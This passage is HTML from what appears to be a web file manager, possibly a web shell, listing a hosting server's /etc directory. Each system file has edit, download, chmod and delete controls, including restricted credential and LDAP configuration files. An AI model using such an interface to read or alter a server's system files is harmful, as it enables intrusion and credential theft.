                            <td><a href="?p=%2Fetc%2Fxml" class="folder-link">📁 xml</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:06</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/xml','xml')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/xml','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/xml',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="yum">
                            <td><a href="?p=%2Fetc%2Fyum" class="folder-link">📁 yum</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-27 09:23</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/yum','yum')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/yum','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/yum',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="yum.repos.d">
                            <td><a href="?p=%2Fetc%2Fyum.repos.d" class="folder-link">📁 yum.repos.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 06:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/yum.repos.d','yum.repos.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/yum.repos.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/yum.repos.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                                <tr data-name="buildtime">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2FBUILDTIME" class="file-link">📄 BUILDTIME</a></td>
                            <td class="size">14 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-11-18 19:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2FBUILDTIME" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2FBUILDTIME" class="action-button">Download</a>
                                <button onclick="showRename('/etc/BUILDTIME','BUILDTIME')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/BUILDTIME','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/BUILDTIME',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dir_colors">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2FDIR_COLORS" class="file-link">📄 DIR_COLORS</a></td>
                            <td class="size">4.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-06-25 00:24</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2FDIR_COLORS" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2FDIR_COLORS" class="action-button">Download</a>
                                <button onclick="showRename('/etc/DIR_COLORS','DIR_COLORS')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/DIR_COLORS','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/DIR_COLORS',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dir_colors.lightbgcolor">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2FDIR_COLORS.lightbgcolor" class="file-link">📄 DIR_COLORS.lightbgcolor</a></td>
                            <td class="size">4.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-06-25 00:24</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2FDIR_COLORS.lightbgcolor" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2FDIR_COLORS.lightbgcolor" class="action-button">Download</a>
                                <button onclick="showRename('/etc/DIR_COLORS.lightbgcolor','DIR_COLORS.lightbgcolor')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/DIR_COLORS.lightbgcolor','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/DIR_COLORS.lightbgcolor',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="grep_colors">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2FGREP_COLORS" class="file-link">📄 GREP_COLORS</a></td>
                            <td class="size">94 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2022-01-31 20:20</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2FGREP_COLORS" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2FGREP_COLORS" class="action-button">Download</a>
                                <button onclick="showRename('/etc/GREP_COLORS','GREP_COLORS')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/GREP_COLORS','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/GREP_COLORS',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="adjtime">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fadjtime" class="file-link">📄 adjtime</a></td>
                            <td class="size">16 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-11-18 19:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fadjtime" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fadjtime" class="action-button">Download</a>
                                <button onclick="showRename('/etc/adjtime','adjtime')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/adjtime','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/adjtime',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="agent360.ini">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fagent360.ini" class="file-link">📄 agent360.ini</a></td>
                            <td class="size">817 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-04-13 20:58</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fagent360.ini" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fagent360.ini" class="action-button">Download</a>
                                <button onclick="showRename('/etc/agent360.ini','agent360.ini')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/agent360.ini','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/agent360.ini',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="aliases">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Faliases" class="file-link">📄 aliases</a></td>
                            <td class="size">1.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Faliases" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Faliases" class="action-button">Download</a>
                                <button onclick="showRename('/etc/aliases','aliases')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/aliases','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/aliases',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="almalinux-release">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Falmalinux-release" class="file-link">📄 almalinux-release</a></td>
                            <td class="size">37 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-19 07:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Falmalinux-release" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Falmalinux-release" class="action-button">Download</a>
                                <button onclick="showRename('/etc/almalinux-release','almalinux-release')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/almalinux-release','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/almalinux-release',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="anacrontab">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fanacrontab" class="file-link">📄 anacrontab</a></td>
                            <td class="size">541 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-05-02 00:27</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fanacrontab" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fanacrontab" class="action-button">Download</a>
                                <button onclick="showRename('/etc/anacrontab','anacrontab')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/anacrontab','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/anacrontab',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="antivirus.exim">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fantivirus.exim" class="file-link">📄 antivirus.exim</a></td>
                            <td class="size">6.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-07 01:28</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fantivirus.exim" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fantivirus.exim" class="action-button">Download</a>
                                <button onclick="showRename('/etc/antivirus.exim','antivirus.exim')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/antivirus.exim','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/antivirus.exim',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="asound.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fasound.conf" class="file-link">📄 asound.conf</a></td>
                            <td class="size">55 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-03-31 10:16</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fasound.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fasound.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/asound.conf','asound.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/asound.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/asound.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="at.deny">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fat.deny" class="file-link">📄 at.deny</a></td>
                            <td class="size">1 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-11-12 00:38</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fat.deny" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fat.deny" class="action-button">Download</a>
                                <button onclick="showRename('/etc/at.deny','at.deny')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/at.deny','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/at.deny',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="auto.backups">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.backups" class="file-link">📄 auto.backups</a></td>
                            <td class="size">656 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:17</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.backups" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fauto.backups" class="action-button">Download</a>
                                <button onclick="showRename('/etc/auto.backups','auto.backups')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/auto.backups','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/auto.backups',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="auto.master">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.master" class="file-link">📄 auto.master</a></td>
                            <td class="size">33 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 15:09</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.master" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fauto.master" class="action-button">Download</a>
                                <button onclick="showRename('/etc/auto.master','auto.master')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/auto.master','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/auto.master',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="auto.misc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.misc" class="file-link">📄 auto.misc</a></td>
                            <td class="size">519 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-04 22:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.misc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fauto.misc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/auto.misc','auto.misc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/auto.misc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/auto.misc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="auto.net">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.net" class="file-link">📄 auto.net</a></td>
                            <td class="size">901 B</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-04 22:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.net" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fauto.net" class="action-button">Download</a>
                                <button onclick="showRename('/etc/auto.net','auto.net')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/auto.net','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/auto.net',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="auto.smb">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.smb" class="file-link">📄 auto.smb</a></td>
                            <td class="size">2.0 KB</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-04 22:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fauto.smb" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fauto.smb" class="action-button">Download</a>
                                <button onclick="showRename('/etc/auto.smb','auto.smb')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/auto.smb','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/auto.smb',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="autofs.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fautofs.conf" class="file-link">📄 autofs.conf</a></td>
                            <td class="size">15.5 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 15:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fautofs.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fautofs.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/autofs.conf','autofs.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/autofs.conf','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/autofs.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="autofs_ldap_auth.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fautofs_ldap_auth.conf" class="file-link">📄 autofs_ldap_auth.conf</a></td>
                            <td class="size">232 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-04 22:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fautofs_ldap_auth.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fautofs_ldap_auth.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/autofs_ldap_auth.conf','autofs_ldap_auth.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/autofs_ldap_auth.conf','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/autofs_ldap_auth.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="backupmxhosts">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fbackupmxhosts" class="file-link">📄 backupmxhosts</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fbackupmxhosts" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fbackupmxhosts" class="action-button">Download</a>
                                <button onclick="showRename('/etc/backupmxhosts','backupmxhosts')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/backupmxhosts','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/backupmxhosts',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="banneddomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fbanneddomains" class="file-link">📄 banneddomains</a></td>
                            <td class="size">4.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fbanneddomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fbanneddomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/banneddomains','banneddomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/banneddomains','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/banneddomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="bashrc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fbashrc" class="file-link">📄 bashrc</a></td>
                            <td class="size">1.9 KB</td>
                            <td><span class="permissions">0664</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fbashrc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fbashrc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/bashrc','bashrc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/bashrc','0664')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/bashrc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="bindresvport.blacklist">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fbindresvport.blacklist" class="file-link">📄 bindresvport.blacklist</a></td>
                            <td class="size">535 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-10-01 17:46</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fbindresvport.blacklist" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fbindresvport.blacklist" class="action-button">Download</a>
                                <button onclick="showRename('/etc/bindresvport.blacklist','bindresvport.blacklist')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/bindresvport.blacklist','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/bindresvport.blacklist',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="blocked_incoming_email_countries">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblocked_incoming_email_countries" class="file-link">📄 blocked_incoming_email_countries</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblocked_incoming_email_countries" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fblocked_incoming_email_countries" class="action-button">Download</a>
                                <button onclick="showRename('/etc/blocked_incoming_email_countries','blocked_incoming_email_countries')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/blocked_incoming_email_countries','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/blocked_incoming_email_countries',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="blocked_incoming_email_country_ips">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblocked_incoming_email_country_ips" class="file-link">📄 blocked_incoming_email_country_ips</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-07 01:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblocked_incoming_email_country_ips" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fblocked_incoming_email_country_ips" class="action-button">Download</a>
                                <button onclick="showRename('/etc/blocked_incoming_email_country_ips','blocked_incoming_email_country_ips')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/blocked_incoming_email_country_ips','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/blocked_incoming_email_country_ips',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="blocked_incoming_email_domains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblocked_incoming_email_domains" class="file-link">📄 blocked_incoming_email_domains</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblocked_incoming_email_domains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fblocked_incoming_email_domains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/blocked_incoming_email_domains','blocked_incoming_email_domains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/blocked_incoming_email_domains','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/blocked_incoming_email_domains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="blockeddomains">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblockeddomains" class="file-link">📄 blockeddomains</a></td>
                            <td class="size">8.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblockeddomains" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fblockeddomains" class="action-button">Download</a>
                                <button onclick="showRename('/etc/blockeddomains','blockeddomains')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/blockeddomains','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/blockeddomains',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="blockedemails">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblockedemails" class="file-link">📄 blockedemails</a></td>
                            <td class="size">322 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:13</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fblockedemails" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fblockedemails" class="action-button">Download</a>
                                <button onclick="showRename('/etc/blockedemails','blockedemails')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/blockedemails','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/blockedemails',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cgconfig.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcgconfig.conf" class="file-link">📄 cgconfig.conf</a></td>
                            <td class="size">2.3 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-04 21:17</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcgconfig.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcgconfig.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cgconfig.conf','cgconfig.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cgconfig.conf','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cgconfig.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="checkyumdisable">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcheckyumdisable" class="file-link">📄 checkyumdisable</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:12</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcheckyumdisable" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcheckyumdisable" class="action-button">Download</a>
                                <button onclick="showRename('/etc/checkyumdisable','checkyumdisable')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/checkyumdisable','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/checkyumdisable',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="clamddisable">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fclamddisable" class="file-link">📄 clamddisable</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fclamddisable" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fclamddisable" class="action-button">Download</a>
                                <button onclick="showRename('/etc/clamddisable','clamddisable')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/clamddisable','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/clamddisable',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="collectd.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcollectd.conf" class="file-link">📄 collectd.conf</a></td>
                            <td class="size">1.0 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-05-09 03:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcollectd.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcollectd.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/collectd.conf','collectd.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/collectd.conf','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/collectd.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpanel_exim_system_filter">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpanel_exim_system_filter" class="file-link">📄 cpanel_exim_system_filter</a></td>
                            <td class="size">11.9 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpanel_exim_system_filter" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpanel_exim_system_filter" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpanel_exim_system_filter','cpanel_exim_system_filter')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpanel_exim_system_filter','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpanel_exim_system_filter',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpanel_mail_netblocks">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpanel_mail_netblocks" class="file-link">📄 cpanel_mail_netblocks</a></td>
                            <td class="size">15 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpanel_mail_netblocks" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpanel_mail_netblocks" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpanel_mail_netblocks','cpanel_mail_netblocks')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpanel_mail_netblocks','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpanel_mail_netblocks',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpanel_php_fpmdisable">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpanel_php_fpmdisable" class="file-link">📄 cpanel_php_fpmdisable</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fcpanel_php_fpmdisable" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fcpanel_php_fpmdisable" class="action-button">Download</a>
                                <button onclick="showRename('/etc/cpanel_php_fpmdisable','cpanel_php_fpmdisable')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpanel_php_fpmdisable','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpanel_php_fpmdisable',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpanelsync.exclude">
